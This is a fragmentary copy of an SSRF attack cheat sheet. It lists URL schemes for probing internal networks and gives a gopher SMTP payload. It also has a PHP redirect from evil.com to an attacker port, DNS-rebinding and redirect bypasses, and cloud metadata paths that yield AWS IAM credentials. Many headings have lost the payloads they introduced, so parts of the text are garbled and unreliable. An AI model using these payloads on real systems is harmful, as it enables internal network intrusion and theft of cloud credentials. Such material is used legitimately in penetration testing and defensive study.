Allows an attacker to fetch the content of a file on the server
HTTP
Allows an attacker to fetch any content from the web, it can also be used to scan ports.
SSRF stream
The following URL scheme can be used to probe the network
Dict
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
SFTP
A network protocol used for secure file transfer over secure shell
TFTP
Trivial File Transfer Protocol, works over UDP
LDAP
Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
Gopher
Gopher HTTP
Gopher SMTP - Back connect to 1337
Gopher SMTP - send a mail
Netdoc
Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
SSRF exploiting WSGI
Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.
Header
modifier1
(1 byte)
0 (%00)
datasize
(2 bytes)
26 (%1A%00)
modifier2
(1 byte)
0 (%00)
Variable (UWSGI_FILE)
key length
(2 bytes)
10
(%0A%00)
key data
(m bytes)
UWSGI_FILE
value length
(2 bytes)
12
(%0C%00)
value data
(n bytes)
/tmp/test.py
SSRF exploiting Redis
Redis is a database system that stores everything in RAM
The content of the file will be integrated inside the PDF as an image or text.
Using an attachment
Example of a PDF attachment using HTML
use <link rel=attachment href="URL"> as Bio text
use 'Download Data' feature to get PDF
use pdfdetach -saveall filename.pdf to extract embedded resource
cat attachment.bin
SSRF URL for Cloud Instances
SSRF URL for AWS Bucket
Docs Interesting path to look for at http://169.254.169.254 or http://instance-data
DNS record
HTTP redirect
Alternate IP encoding
More urls to include
AWS SSRF Bypasses
E.g: Jira SSRF leading to AWS info disclosure - https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance
If you have an SSRF with file system access on an ECS instance, try extracting /proc/self/environ to get UUID.
This way you'll extract IAM keys of the attached role
SSRF URL for AWS Elastic Beanstalk
We retrieve the accountId and region from the API.
We then retrieve the AccessKeyId, SecretAccessKey, and Token from the API.
notsosecureblog-awskey
Then we use the credentials with aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/.
SSRF URL for AWS Lambda
AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.
Documentation available at https://developers.digitalocean.com/documentation/metadata/
SSRF URL for Packetcloud
Documentation available at https://metadata.packet.net/userdata
SSRF URL for Azure
Limited, maybe more exists? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
Update Apr 2017, Azure has more support; requires the header "Metadata: true" https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
3. You can use response codes [307](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307) and [308](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308) in order to retain HTTP method and body after the redirection.
Change "type=file" to "type=url"
Paste URL in text field and hit enter
Using this vulnerability users can upload images from any image URL = trigger an SSRF
Create a domain that change between two IPs. http://1u.ms/ exists for this purpose.
For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain:
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
From: [Hacker] <[email protected]>
To: <[email protected]>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AH
You didn't say the magic word !
.
QUIT
Content of evil.com/redirect.php:
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
Now query it.
https://example.com/?q=http://evil.com/redirect.php.
Always here : /latest/meta-data/{hostname,public-ipv4,...}
User data (startup script for auto-scaling) : /latest/user-data
Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
